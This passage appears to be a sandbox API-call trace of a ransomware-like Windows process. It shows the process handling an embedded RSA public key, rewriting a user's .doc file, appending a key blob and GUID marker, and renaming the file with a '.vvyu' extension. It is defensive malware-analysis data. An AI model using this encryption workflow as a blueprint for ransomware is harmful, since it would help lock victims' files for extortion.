KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0193.917] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2e912b0 [0193.917] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0193.917] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0193.917] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c168) returned 1 [0193.918] CryptCreateHash (in: hProv=0x67c168, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0193.918] CryptHashData (hHash=0x2cfe140, pbData=0x2e912b0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0193.918] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0193.918] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0193.918] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0193.918] GetLastError () returned 0x0 [0193.918] CryptDestroyHash (hHash=0x2cfe140) returned 1 [0193.918] CryptReleaseContext (hProv=0x67c168, dwFlags=0x0) returned 1 [0193.919] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0193.919] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0193.919] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0193.919] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0193.919] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0193.919] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0193.919] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0193.919] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x16090) returned 0x2ea79b0 [0193.919] SetFilePointer (in: hFile=0x568, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0193.920] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0193.920] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0193.920] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0193.920] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2e912b0 [0193.920] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a5b0 [0193.920] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea0be8 [0193.920] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x643af0 [0193.920] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea0c30 [0193.921] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x6572b8 [0193.921] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x657270 [0193.921] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x657300 [0193.921] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x657210 [0193.921] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0193.921] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0193.921] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aa80 [0193.921] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea2a68 [0193.921] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x657270 | out: hHeap=0x620000) returned 1 [0193.921] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x657210 | out: hHeap=0x620000) returned 1 [0193.921] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x657300 | out: hHeap=0x620000) returned 1 [0193.921] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0193.922] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2a68 | out: hHeap=0x620000) returned 1 [0193.922] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x657300 [0193.922] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a50 [0193.922] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x657210 [0193.922] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0193.922] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x657270 [0193.922] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ae0 [0193.922] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c99af8 [0193.922] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0193.922] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a670 [0193.922] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0193.922] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c99d28 [0193.922] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85da8 [0193.922] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0193.923] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0193.923] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x657210 | out: hHeap=0x620000) returned 1 [0193.923] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0193.923] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x657270 | out: hHeap=0x620000) returned 1 [0193.923] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0193.923] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0193.923] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x657300 | out: hHeap=0x620000) returned 1 [0193.923] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0193.924] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a5b0 | out: hHeap=0x620000) returned 1 [0193.924] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aa80 | out: hHeap=0x620000) returned 1 [0193.924] GetCurrentThreadId () returned 0x66c [0193.924] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95c90 [0193.924] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x2e9f800 [0193.924] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd95d8 [0193.924] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c168 [0193.924] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e93a80 [0193.924] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0193.924] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0193.924] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0193.924] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0193.924] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0193.924] GetCurrentThreadId () returned 0x66c [0193.924] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0193.925] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0193.925] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2e914a8 [0193.925] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0193.925] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0193.925] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0193.925] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0193.925] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e914a8 | out: hHeap=0x620000) returned 1 [0193.925] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0193.925] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0193.926] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccaa80 [0193.926] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0193.926] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0193.926] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0193.926] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x657300 [0193.926] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0193.926] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0193.926] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0193.926] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0193.926] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0193.926] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0193.926] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0193.926] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0193.926] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x657270 [0193.926] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0193.926] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ab0 [0193.926] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0193.926] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0193.926] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b10 [0193.926] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0193.926] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0193.926] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x657210 [0193.926] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0193.926] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0193.926] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b10 | out: hHeap=0x620000) returned 1 [0193.926] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x657228 [0193.926] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0193.927] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x6573d8 [0193.927] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0193.927] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a30 [0193.927] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0193.927] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x6572d0 [0193.927] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0193.927] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea1a80 [0193.927] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0193.927] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea1a98 [0193.927] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1a80 | out: hHeap=0x620000) returned 1 [0193.927] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea1a80 [0193.927] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6572d0 | out: hHeap=0x620000) returned 1 [0193.927] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a90 [0193.927] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0193.927] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0193.927] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0193.927] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83cf0 [0193.927] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x657270 | out: hHeap=0x620000) returned 1 [0193.927] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x657270 [0193.927] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0193.927] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2ea2a68 [0193.927] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x657300 | out: hHeap=0x620000) returned 1 [0193.928] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99af8 [0193.928] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1a98 | out: hHeap=0x620000) returned 1 [0193.928] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ea2c78 [0193.928] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0193.928] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c998c8 [0193.928] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0193.928] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99c10 [0193.928] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x657270 | out: hHeap=0x620000) returned 1 [0193.928] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea2e90 [0193.928] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0193.928] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0193.929] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0193.929] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c168 | out: hHeap=0x620000) returned 1 [0193.929] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0193.930] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0193.930] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0193.930] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0193.930] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2c78 | out: hHeap=0x620000) returned 1 [0193.931] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2e90 | out: hHeap=0x620000) returned 1 [0193.931] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0193.931] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0193.931] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1a80 | out: hHeap=0x620000) returned 1 [0193.931] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0193.931] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6573d8 | out: hHeap=0x620000) returned 1 [0193.931] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0193.931] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x657210 | out: hHeap=0x620000) returned 1 [0193.931] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x657228 | out: hHeap=0x620000) returned 1 [0193.931] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e93a80 | out: hHeap=0x620000) returned 1 [0193.932] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd95d8 | out: hHeap=0x620000) returned 1 [0193.932] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0193.932] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6572b8 | out: hHeap=0x620000) returned 1 [0193.932] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0c30 | out: hHeap=0x620000) returned 1 [0193.932] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2a68 | out: hHeap=0x620000) returned 1 [0193.933] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0193.933] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa80 | out: hHeap=0x620000) returned 1 [0193.933] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0193.933] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0193.933] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0193.933] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85da8 | out: hHeap=0x620000) returned 1 [0193.933] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a670 | out: hHeap=0x620000) returned 1 [0193.934] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0193.934] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0193.934] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0193.934] WriteFile (in: hFile=0x568, lpBuffer=0x2ea79b0*, nNumberOfBytesToWrite=0x16081, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ea79b0*, lpNumberOfBytesWritten=0x312fb14*=0x16081, lpOverlapped=0x0) returned 1 [0193.935] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea79b0 | out: hHeap=0x620000) returned 1 [0193.935] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0x16086, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0193.936] WriteFile (in: hFile=0x568, lpBuffer=0x2e95c90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95c90*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0193.936] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95c90 | out: hHeap=0x620000) returned 1 [0193.936] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4658 [0193.936] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2ea2a68 [0193.936] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ea2a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0193.936] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2ea2e98 [0193.936] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2a68 | out: hHeap=0x620000) returned 1 [0193.937] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4658 | out: hHeap=0x620000) returned 1 [0193.937] WriteFile (in: hFile=0x568, lpBuffer=0x2ea2e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ea2e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0193.937] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2e98 | out: hHeap=0x620000) returned 1 [0193.937] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0193.937] WriteFile (in: hFile=0x568, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0193.937] CloseHandle (hObject=0x568) returned 1 [0193.939] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7cf30 [0193.939] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x870) returned 0x2ea2a68 [0193.939] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7cf30 | out: hHeap=0x620000) returned 1 [0193.939] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\KUOP p2txHoo7bw7O.doc" (normalized: "c:\\users\\keecfmwgj\\documents\\kuop p2txhoo7bw7o.doc"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\KUOP p2txHoo7bw7O.doc.vvyu" (normalized: "c:\\users\\keecfmwgj\\documents\\kuop p2txhoo7bw7o.doc.vvyu")) returned 1 [0193.940] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2a68 | out: hHeap=0x620000) returned 1 [0193.941] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0193.941] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0193.943] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7cd50 | out: hHeap=0x620000) returned 1 [0193.943] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe071b010, ftCreationTime.dwHighDateTime=0x1d89d93, ftLastAccessTime.dwLowDateTime=0x92457ac0, ftLastAccessTime.dwHighDateTime=0x1d8a3d8, ftLastWriteTime.dwLowDateTime=0x92457ac0, ftLastWriteTime.dwHighDateTime=0x1d8a3d8, nFileSizeHigh=0x0, nFileSizeLow=0x3913, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="KW5J7A5.doc", cAlternateFileName="")) returned 1 [0193.943] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea0c30 [0193.943] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4658 [0193.944] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0c30 | out: hHeap=0x620000) returned 1 [0193.944] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\KW5J7A5.doc") returned=".doc" [0193.944] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\KW5J7A5.doc" (normalized: "c:\\users\\keecfmwgj\\documents\\kw5j7a5.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x568 [0193.944] GetFileSizeEx (in: hFile=0x568, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=14611) returned 1 [0193.944] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 